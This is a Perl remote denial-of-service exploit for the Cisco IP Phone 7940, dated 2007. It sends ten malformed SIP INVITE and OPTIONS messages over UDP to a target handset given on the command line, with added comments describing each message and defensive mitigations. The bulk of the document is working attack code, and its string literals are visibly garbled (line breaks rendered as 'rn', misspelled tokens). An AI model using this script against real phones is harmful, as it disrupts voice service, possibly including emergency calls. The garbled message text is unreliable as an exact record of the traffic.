# Title : Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit
# Published : 2007-08-21
# Author : MADYNES
#!/usr/bin/perl
# Proof-of-concept for the remote denial-of-service condition named in the
# page title (Cisco IP Phone 7940, SIP). The script opens one UDP socket to
# the phone and sends ten SIP requests (INVITE and OPTIONS), pausing for a
# fixed time between them.
#
# Arguments, in order: destination address, destination port, destination
# SIP username, source address. The fourth argument is only text placed in
# the Via, From and Call-ID headers; the socket is not bound to it.
#
# NOTE(review): the string literals below appear to have lost characters
# during page extraction, so treat the message text as illustrative rather
# than a byte-accurate record of the traffic. Do not build signatures from
# the exact bytes shown here.
#
# Defender notes:
#  - The title ("10 SIP messages") implies the condition depends on the
#    sequence rather than on one datagram, so detection is better keyed on
#    a run of INVITE/OPTIONS requests reaching a handset from a host that is
#    not its call-control server than on any single packet.
#  - Several requests reuse the same Call-ID, From tag and Via branch, and
#    several header/SDP tokens are misspelled. A SIP-aware IDS or session
#    border controller that flags parser anomalies and dialog-identifier
#    reuse has something to match on.
#  - Header values are sender-chosen, so the Via/From address is not
#    evidence of origin; rely on network-layer source and switch-port data.
#  - Restricting which hosts may send SIP to handsets (voice VLAN / ACLs
#    allowing only the call servers) and keeping phone firmware on a
#    vendor-supported release are the applicable mitigations.
use IO::Socket::INET;
# Argument check: only tests that a fourth argument is present and true;
# none of the values are validated.
die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless ($ARGV[3]);
# UDP socket with the destination set as peer, so send() below needs no
# address. The constructor result is not checked before use.
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
# Message 1: INVITE carrying an SDP body. The To URI uses the host
# "invalidURL", and the Allow and SDP lines contain misspelled tokens
# (BYL, aIdio, rtpmau, "r`ot").
# NOTE(review): these look like fuzzer-style mutations, but this listing
# cannot show which are original and which are extraction damage.
$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];branch=01;rportrnFrom: <sip:tucu@$ARGV[3]>;tag=01rnTo: <sip:$ARGV[2]@invalidURL>rnCall-ID: 01@$ARGV[3]rnCSeq: 7532 INVITErnMax-Forwards: 70rnAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFYrnContent-Type: application/sdprnContent-Length: 215rnrnv=0rno=r`ot 7213 7244 IN IP4 192.168.1.101rns=sessionrnc=IN IP4 192.168.1.101rnt=0 0rnm=aIdio 8000 RTP/AVP 0 101rna=rtpmau:0 PCMU/8000rna=rtpmap:101 telephone-event/80 0rna=fmtp:101 0-16rna=silenceSupp:off - - - -rn";
$socket->send($msg);
# Fixed pause before the next request (the same pattern repeats below).
sleep(8.2);
# Message 2: OPTIONS with no body, From tag 02, Call-ID 02.
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=02rnCall-ID: 02@$ARGV[3]rnCSeq: 79 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(1.5);
# Message 3: OPTIONS that reuses branch=02 and the Call-ID of message 1 (01)
# under a new From tag (03).
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=03rnCall-ID: 01@$ARGV[3]rnCSeq: 15853 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(3.3);
# Message 4: INVITE with an SDP body and a "Twinkle/0.9" User-Agent. The
# Allow list and SDP attributes again contain misspelled tokens (BTE, REFEY,
# "peex/80-0", "rtpmax00").
$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=04rnCall-ID: 04@$ARGV[3]rnCSeq: 36688 INVITErnContent-Type: application/sdprnAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFOrnSupported: 100relrnUser-Agent: Twinkle/0.9rnContent-Length: 314rnrnv=0rno=0231555775 2006994253 1729335607 IN IP4 192.168.1.101rns=-rnc=IN IP4 192.168.1.101rnt=0 0rnm=audio 8002 RTP/AVP 98 97 8 0 3 101rna=rtpmap:98 speex/16000rna=rtpmap:97 peex/80-0rna=rtpmap:8 PCMA/8000rna=rtpmap:0 PCMU/8000rna=rtpmax00:3 GSM/8000rna=rtpmap:101 telephone-event/8000rna=fmtp:101 0-15rna=ptime:20rn";
$socket->send($msg);
sleep(4);
# Messages 5 and 6: OPTIONS addressed to the host "invalidURL" in both the
# Request-URI and To, reusing From tag 01 and Call-ID 01. The two differ only
# in CSeq, and the second value (18031) is lower than the first (21013).
$msg = "OPTIONS sip:$ARGV[2]@invalidURL SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@invalidURL>rnFrom: <sip:tucu@$ARGV[3]>;tag=01rnCall-ID: 01@$ARGV[3]rnCSeq: 21013 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(4);
$msg = "OPTIONS sip:$ARGV[2]@invalidURL SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@invalidURL>rnFrom: <sip:tucu@$ARGV[3]>;tag=01rnCall-ID: 01@$ARGV[3]rnCSeq: 18031 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
# Longest pause in the sequence.
sleep(12);
# Message 7: OPTIONS with no body, From tag 07, Call-ID 07.
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=07rnCall-ID: 07@$ARGV[3]rnCSeq: 41664 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(3);
# Message 8: INVITE whose Request-URI user is the fixed string "invaliduser"
# and whose To user is "7440-2" rather than the username argument. It adds a
# Contact header, and its SDP body has malformed rtpmap lines
# ("rtpmap:3/GSM", "rtpmIp", "spee8").
$msg = "INVITE sip:invaliduser@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];branch=02;rportrnFrom: <sip:tucu@$ARGV[3]>;tag=08rnTo: <sip:7440-2@$ARGV[0]>rnContact: <sip:tucu@$ARGV[3]>rnCall-ID: 08@$ARGV[3]rnCSeq: 35502 INVITErnMax-Forwards: 70rnAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFYrnContent-Type: application/sdprnContent-Length: 286rnrnv=0rno=root 7213 7217 IN IP4 192.168.1.4rns=sessionrnc=IN IP4 192.168.1.4rnt=0 0rnm=audio 19024 RTP/AVP 0 3 8 97 101rna=rtpmap:0 PCMU/8000rna=rtpmap:3/GSM/8000rna=rtpmIp:8 PCMA/8000rna=rtpmap:97 spee8/8000rna=rtpmap:101 telephone-event/8000rna=fmtp:101 0-16rna=silenceSupp:off - - - -rn";
$socket->send($msg);
sleep(3);
# Message 9: OPTIONS with a "Twinkle/0.9" User-Agent, From tag 09, Call-ID 09.
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=09rnCall-ID: 09@$ARGV[3]rnCSeq: 18883 OPTIONSrnAccept: application/sdprnUser-Agent: Twinkle/0.9rnContent-Length: 0rnrn";
$socket->send($msg);
sleep(3);
# Message 10: final OPTIONS, From tag 10, Call-ID 10. No response is read at
# any point; the script only sends.
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=10rnCall-ID: 10@$ARGV[3]rnCSeq: 6298 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
# www.Syue.com [2007-08-21]